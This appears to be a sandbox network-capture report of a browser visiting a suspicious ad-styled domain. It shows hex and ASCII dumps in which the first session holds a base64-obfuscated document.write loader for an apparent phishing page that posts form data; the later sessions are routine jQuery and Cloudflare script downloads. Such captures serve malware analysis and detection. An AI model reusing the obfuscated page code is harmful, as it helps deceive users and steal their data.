                                                                                                                                      Set-Cookie: XSRF-TOKEN=eyJpdiI6Ik0zZXU5YmFkS3YzdkxkSGY0RGcwM3c9PSIsInZhbHVlIjoiTDB2RzJ4UHRKWVdKKy9uOE9rRXBuOWZmbFhIaFIvNmRSYmpVbldlcEF4a3ZPOEg0YUFsQlVMQkd4NG1BOTNpZEsvcW5CRjBKQzlic0dTTEFtRVZZdmdrVk40QjUxYTBxRnhWVE84VnQ4eEVxOGJmY3VyZEI0MzdodnRROER4SFoiLCJtYWMiOiIzNDMyZTg1MmY0Y2Y2ZTk1NDk5NTJjYTBjMWJjOTJiYTc2YWNmYTE2ODI4OWVhOGIyNWMxZGM2ODgwMTU0NTIwIiwidGFnIjoiIn0%3D; expires=Wed, 08-May-2024 20:12:32 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                                                      2024-05-08 18:12:32 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6a 4a 58 4d 57 4e 6d 61 6d 70 50 51 55 39 42 65 44 4e 57 51 6a 52 36 52 7a 59 34 62 6d 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 56 6b 35 45 4e 32 51 72 61 6c 4a 54 62 57 39 72 56 47 4e 71 4d 6e 70 4a 64 55 4e 4a 53 43 74 50 61 54 41 34 5a 6d 35 4c 4d 55 74 56 61 54 59 77 56 30 4e 58 63 6c 41 7a 4c 32 78 6e 56 55 31 30 63 45 52 7a 55 30 5a 48 52 6b 31 6d 61 58 70 36 4d 56 6c 32 63 45 35 77 4e 47 70 33 62 6a 46 46 61 33 6c 48 65 54 5a 68 5a 47 35 53 64 57 73 32 56 30 6c 79 53 7a 52 35 4e 6b 68 6d 55 33 4e 4d 61 32 39 58 4d 47 73 30 57 6d 56 4c 55 6a 5a 54 62 6d 52 69 59 57 59 33 4e 47 4e 44 5a 45 4e 33 4e 57 34 31 64 45 6c 6b 54 58 59
                                                                                                                                      Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IjJXMWNmampPQU9BeDNWQjR6RzY4bmc9PSIsInZhbHVlIjoiVk5EN2QralJTbW9rVGNqMnpJdUNJSCtPaTA4Zm5LMUtVaTYwV0NXclAzL2xnVU10cERzU0ZHRk1maXp6MVl2cE5wNGp3bjFFa3lHeTZhZG5SdWs2V0lySzR5NkhmU3NMa29XMGs0WmVLUjZTbmRiYWY3NGNDZEN3NW41dElkTXY
                                                                                                                                      2024-05-08 18:12:32 UTC1369INData Raw: 31 38 31 65 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c 62 69 49 2b 44 51 6f 38 61 47 56 68 5a 44 34 4e 43 69 41 67 49 43 41 38 63 32 4e 79 61 58 42 30 49 48 4e 79 59 7a 30 69 61 48 52 30 63 48 4d 36 4c 79 39 6a 62 32 52 6c 4c 6d 70 78 64 57 56 79 65 53 35 6a 62 32 30 76 61 6e 46 31 5a 58 4a 35 4c 54 4d 75 4e 69 34 77 4c 6d 31 70 62 69 35 71 63 79 49 2b 50 43 39 7a 59 33 4a 70 63 48 51 2b 44 51 6f 67 49 43 41 67 50 48 4e 6a 63 6d 6c 77 64 43 42 7a 63 6d 4d 39 49 6d 68 30 64 48 42 7a 4f 69 38 76 59 32 68 68 62 47
                                                                                                                                      Data Ascii: 181e<script>document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbG
                                                                                                                                      2024-05-08 18:12:32 UTC1369INData Raw: 44 51 6f 67 49 47 39 32 5a 58 4a 6d 62 47 39 33 4f 69 42 6f 61 57 52 6b 5a 57 34 37 44 51 70 39 44 51 6f 6a 53 32 68 6b 54 30 68 32 57 6b 56 72 64 69 42 6f 4e 48 74 74 59 58 4a 6e 61 57 34 74 64 47 39 77 4f 6a 41 37 62 57 46 79 5a 32 6c 75 4c 57 4a 76 64 48 52 76 62 54 6f 75 4e 58 4a 6c 62 54 74 6d 62 32 35 30 4c 58 64 6c 61 57 64 6f 64 44 6f 31 4d 44 41 37 62 47 6c 75 5a 53 31 6f 5a 57 6c 6e 61 48 51 36 4d 53 34 79 4f 33 30 4e 43 69 4e 4c 61 47 52 50 53 48 5a 61 52 57 74 32 49 47 67 30 65 32 5a 76 62 6e 51 74 63 32 6c 36 5a 54 70 6a 59 57 78 6a 4b 44 45 75 4d 79 6b 37 66 51 30 4b 51 47 31 6c 5a 47 6c 68 49 43 68 74 61 57 34 74 64 32 6c 6b 64 47 67 36 4d 54 49 77 4d 48 42 34 4b 58 73 4e 43 69 4e 4c 61 47 52 50 53 48 5a 61 52 57 74 32 49 47 67 30 65 32 5a
                                                                                                                                      Data Ascii: DQogIG92ZXJmbG93OiBoaWRkZW47DQp9DQojS2hkT0h2WkVrdiBoNHttYXJnaW4tdG9wOjA7bWFyZ2luLWJvdHRvbTouNXJlbTtmb250LXdlaWdodDo1MDA7bGluZS1oZWlnaHQ6MS4yO30NCiNLaGRPSHZaRWt2IGg0e2ZvbnQtc2l6ZTpjYWxjKDEuMyk7fQ0KQG1lZGlhIChtaW4td2lkdGg6MTIwMHB4KXsNCiNLaGRPSHZaRWt2IGg0e2Z
                                                                                                                                      2024-05-08 18:12:32 UTC1369INData Raw: 54 49 67 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 49 44 41 75 4e 58 4a 6c 62 53 46 70 62 58 42 76 63 6e 52 68 62 6e 51 37 66 51 30 4b 49 30 74 6f 5a 45 39 49 64 6c 70 46 61 33 59 67 4c 6d 67 30 49 48 74 6d 62 32 35 30 4c 58 4e 70 65 6d 55 36 49 47 4e 68 62 47 4d 6f 4c 6a 6b 77 4d 48 4a 6c 62 53 41 72 49 43 34 7a 64 6e 63 70 4f 33 30 4e 43 69 4e 4c 61 47 52 50 53 48 5a 61 52 57 74 32 49 43 35 71 64 58 4e 30 61 57 5a 35 4c 57 4e 76 62 6e 52 6c 62 6e 51 74 59 32 56 75 64 47 56 79 65 32 70 31 63 33 52 70 5a 6e 6b 74 59 32 39 75 64 47 56 75 64 44 70 6a 5a 57 35 30 5a 58 49 68 61 57 31 77 62 33 4a 30 59 57 35 30 4f 33 30 4e 43 69 4e 4c 61 47 52 50 53 48 5a 61 52 57 74 32 4c 6d 31 30 4c 54 56 37 62 57 46 79 5a 32 6c 75 4c 58 52 76 63 44 6f 7a 63 6d 56 74
                                                                                                                                      Data Ascii: TIge21hcmdpbi10b3A6IDAuNXJlbSFpbXBvcnRhbnQ7fQ0KI0toZE9IdlpFa3YgLmg0IHtmb250LXNpemU6IGNhbGMoLjkwMHJlbSArIC4zdncpO30NCiNLaGRPSHZaRWt2IC5qdXN0aWZ5LWNvbnRlbnQtY2VudGVye2p1c3RpZnktY29udGVudDpjZW50ZXIhaW1wb3J0YW50O30NCiNLaGRPSHZaRWt2Lm10LTV7bWFyZ2luLXRvcDozcmVt
                                                                                                                                      2024-05-08 18:12:32 UTC1369INData Raw: 30 69 61 48 52 30 63 48 4d 36 4c 79 39 30 5a 57 78 6c 5a 6d 39 79 62 6d 6c 6a 59 58 52 70 62 32 34 75 59 32 39 74 4c 79 49 2b 44 51 6f 38 61 57 35 77 64 58 51 67 64 48 6c 77 5a 54 30 69 61 47 6c 6b 5a 47 56 75 49 69 42 70 5a 44 30 69 59 6d 78 30 5a 48 56 68 49 69 42 75 59 57 31 6c 50 53 4a 69 62 48 52 6b 64 57 45 69 49 48 5a 68 62 48 56 6c 50 53 4a 4e 62 33 70 70 62 47 78 68 4c 7a 55 75 4d 43 41 6f 56 32 6c 75 5a 47 39 33 63 79 42 4f 56 43 41 78 4d 43 34 77 4f 79 42 58 61 57 34 32 4e 44 73 67 65 44 59 30 4b 53 42 42 63 48 42 73 5a 56 64 6c 59 6b 74 70 64 43 38 31 4d 7a 63 75 4d 7a 59 67 4b 45 74 49 56 45 31 4d 4c 43 42 73 61 57 74 6c 49 45 64 6c 59 32 74 76 4b 53 42 44 61 48 4a 76 62 57 55 76 4d 54 45 33 4c 6a 41 75 4d 43 34 77 49 46 4e 68 5a 6d 46 79 61
                                                                                                                                      Data Ascii: 0iaHR0cHM6Ly90ZWxlZm9ybmljYXRpb24uY29tLyI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBpZD0iYmx0ZHVhIiBuYW1lPSJibHRkdWEiIHZhbHVlPSJNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXaW42NDsgeDY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvMTE3LjAuMC4wIFNhZmFya
                                                                                                                                      2024-05-08 18:12:32 UTC706INData Raw: 55 49 69 77 4e 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 47 4a 76 5a 48 6b 36 49 47 35 6c 64 79 42 47 62 33 4a 74 52 47 46 30 59 53 68 74 55 57 52 73 65 55 70 58 59 32 5a 58 4b 51 30 4b 49 43 41 67 49 43 41 67 49 43 42 39 4b 53 35 30 61 47 56 75 4b 48 4a 6c 63 33 42 76 62 6e 4e 6c 49 44 30 2b 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 48 4a 6c 64 48 56 79 62 69 42 79 5a 58 4e 77 62 32 35 7a 5a 53 35 71 63 32 39 75 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 30 70 4c 6e 52 6f 5a 57 34 6f 5a 47 46 30 59 53 41 39 50 69 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 70 5a 69 68 6b 59 58 52 68 57 79 64 7a 64 47 46 30 64 58 4d 6e 58 53 41 39 50 53 41 6e 63 33 56 6a 59 32 56 7a 63 79 63 70 65 77 30 4b 49 43
                                                                                                                                      Data Ascii: UIiwNCiAgICAgICAgICAgIGJvZHk6IG5ldyBGb3JtRGF0YShtUWRseUpXY2ZXKQ0KICAgICAgICB9KS50aGVuKHJlc3BvbnNlID0+IHsNCiAgICAgICAgICAgIHJldHVybiByZXNwb25zZS5qc29uKCk7DQogICAgICAgIH0pLnRoZW4oZGF0YSA9PiB7DQogICAgICAgICAgICBpZihkYXRhWydzdGF0dXMnXSA9PSAnc3VjY2Vzcycpew0KIC
                                                                                                                                      2024-05-08 18:12:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      8192.168.2.1649725151.101.66.1374435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:32 UTC652OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                                                      Host: code.jquery.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                      Referer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-05-08 18:12:33 UTC566INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      Content-Length: 89501
                                                                                                                                      Server: nginx
                                                                                                                                      Content-Type: application/javascript; charset=utf-8
                                                                                                                                      Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                      ETag: "28feccc0-15d9d"
                                                                                                                                      Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      Age: 1048134
                                                                                                                                      Date: Wed, 08 May 2024 18:12:33 GMT
                                                                                                                                      X-Served-By: cache-lga21931-LGA, cache-bfi-kbfi7400037-BFI
                                                                                                                                      X-Cache: HIT, HIT
                                                                                                                                      X-Cache-Hits: 2, 0
                                                                                                                                      X-Timer: S1715191953.138379,VS0,VE1
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      2024-05-08 18:12:33 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                      Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                                      2024-05-08 18:12:33 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                                                                                      Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                                                                                      2024-05-08 18:12:33 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                                                                                      Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                                                                                      2024-05-08 18:12:33 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                                                                                      Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                                                                                      2024-05-08 18:12:33 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                                                                                      Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                                                                                      2024-05-08 18:12:33 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                                                                                      Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      9192.168.2.1649726104.17.2.1844435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:32 UTC678OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                      Referer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-05-08 18:12:33 UTC336INHTTP/1.1 302 Found
                                                                                                                                      Date: Wed, 08 May 2024 18:12:33 GMT
                                                                                                                                      Content-Length: 0
                                                                                                                                      Connection: close
                                                                                                                                      location: /turnstile/v0/b/ce7818f50e39/api.js
                                                                                                                                      access-control-allow-origin: *
                                                                                                                                      cache-control: max-age=300, public
                                                                                                                                      cross-origin-resource-policy: cross-origin
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6b2b6fa6763f-SEA
                                                                                                                                      alt-svc: h3=":443"; ma=86400


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      10192.168.2.1649727104.17.2.1844435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:33 UTC677OUTGET /turnstile/v0/b/ce7818f50e39/api.js HTTP/1.1
                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                      Referer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-05-08 18:12:33 UTC346INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:12:33 GMT
                                                                                                                                      Content-Type: application/javascript; charset=UTF-8
                                                                                                                                      Content-Length: 42566
                                                                                                                                      Connection: close
                                                                                                                                      access-control-allow-origin: *
                                                                                                                                      cross-origin-resource-policy: cross-origin
                                                                                                                                      cache-control: max-age=604800, public
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6b2fda05094c-SEA
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      2024-05-08 18:12:33 UTC1023INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 62 74 28 65 2c 72 2c 74 2c 6f 2c 6c 2c 73 2c 6d 29 7b 74 72 79 7b 76 61 72 20 62 3d 65 5b 73 5d 28 6d 29 2c 68 3d 62 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 64 29 7b 74 28 64 29 3b 72 65 74 75 72 6e 7d 62 2e 64 6f 6e 65 3f 72 28 68 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 68 29 2e 74 68 65 6e 28 6f 2c 6c 29 7d 66 75 6e 63 74 69 6f 6e 20 45 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 74 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 6c 29 7b 76 61 72 20 73 3d 65 2e 61 70 70 6c 79 28 72 2c 74 29 3b 66 75 6e 63 74
                                                                                                                                      Data Ascii: "use strict";(function(){function bt(e,r,t,o,l,s,m){try{var b=e[s](m),h=b.value}catch(d){t(d);return}b.done?r(h):Promise.resolve(h).then(o,l)}function Et(e){return function(){var r=this,t=arguments;return new Promise(function(o,l){var s=e.apply(r,t);funct
                                                                                                                                      2024-05-08 18:12:33 UTC1369INData Raw: 72 28 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 6c 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 74 2e 70 75 73 68 2e 61 70 70 6c 79 28 74 2c 6f 29 7d 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 77 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75 6c 6c 3f 72 3a 7b 7d 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 65 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 28 72 29 29 3a 66 72 28 4f 62 6a 65 63 74 28 72 29 29 2e 66 6f 72 45 61 63 68
                                                                                                                                      Data Ascii: r(function(l){return Object.getOwnPropertyDescriptor(e,l).enumerable})),t.push.apply(t,o)}return t}function wt(e,r){return r=r!=null?r:{},Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):fr(Object(r)).forEach
